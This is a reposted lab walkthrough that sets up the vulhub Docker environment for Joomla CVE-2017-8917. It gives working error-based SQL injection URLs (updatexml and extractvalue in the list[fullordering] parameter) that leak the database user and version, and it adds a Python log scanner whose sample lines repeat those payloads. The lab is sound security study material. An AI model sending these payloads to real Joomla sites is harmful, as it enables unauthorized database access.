This vulnerability test uses an Ubuntu 18.04 LTS virtual machine.
sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl software-properties-common
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
sudo apt-get update
sudo apt-get install -y docker-ce
sudo systemctl status docker
sudo systemctl start docker
sudo docker run hello-world
If the output above appears, Docker was installed successfully. It is recommended to take a VM snapshot before installing Docker.
sudo curl -L "https://github.com/docker/compose/releases/download/1.23.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
docker-compose --version
git clone https://github.com/vulhub/vulhub
cd vulhub/joomla/CVE-2017-8917
sudo docker-compose up -d
Visit the following URL:
http://localhost:8080
Database host name: mysql:3306
Database user name: root
Database password: root
Database name: joomla
Append the following to the address localhost:8080 and visit it:
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
Change updatexml(0x23,concat(1,user()),1) to extractvalue(666,concat(0x3a,version(),0x3a)):
extractvalue(666,concat(0x3a,version(),0x3a))
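As an added example (not part of the original post), the following Python sketch shows how a defender could spot these requests in a web server access log: it flags com_fields requests whose list[fullordering] value is not a plain column name with an optional ASC/DESC. The combined log format, the sample log lines and the allow-list pattern are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: a legitimate ordering value is a column name plus optional direction.
SAFE_ORDERING = re.compile(r"^[A-Za-z0-9_.]+( (ASC|DESC))?$", re.IGNORECASE)
# Request field of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_ordering(log_line):
    """Return the decoded list[fullordering] value when a com_fields request
    carries anything other than a plain column/direction pair, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    # parse_qs percent-decodes keys and values, so list%5Bfullordering%5D is covered.
    query = parse_qs(match.group(1).partition("?")[2])
    if "com_fields" not in query.get("option", []):
        return None
    for value in query.get("list[fullordering]", []):
        if not SAFE_ORDERING.match(value.strip()):
            return value
    return None

def scan(lines):
    """Return the flagged ordering values, in log order."""
    hits = (suspicious_ordering(line) for line in lines)
    return [hit for hit in hits if hit is not None]

# Constructed sample log lines (documentation IP range, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.title+ASC HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Jan/2020:10:00:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) HTTP/1.1" 500 2048',
    '192.0.2.66 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=extractvalue%28666%2Cconcat%280x3a%2Cversion%28%29%2C0x3a%29%29 HTTP/1.1" 500 2048',
    '192.0.2.10 - - [01/Jan/2020:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 7300',
]

if __name__ == "__main__":
    for value in scan(SAMPLE_LOG):
        print("suspicious list[fullordering]:", value)
```

The allow-list approach flags both the plain and the percent-encoded form of the request, since the value is decoded before it is checked.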
Reposted from:
https://blog.csdn.net/sun1296825481/article/details/103485401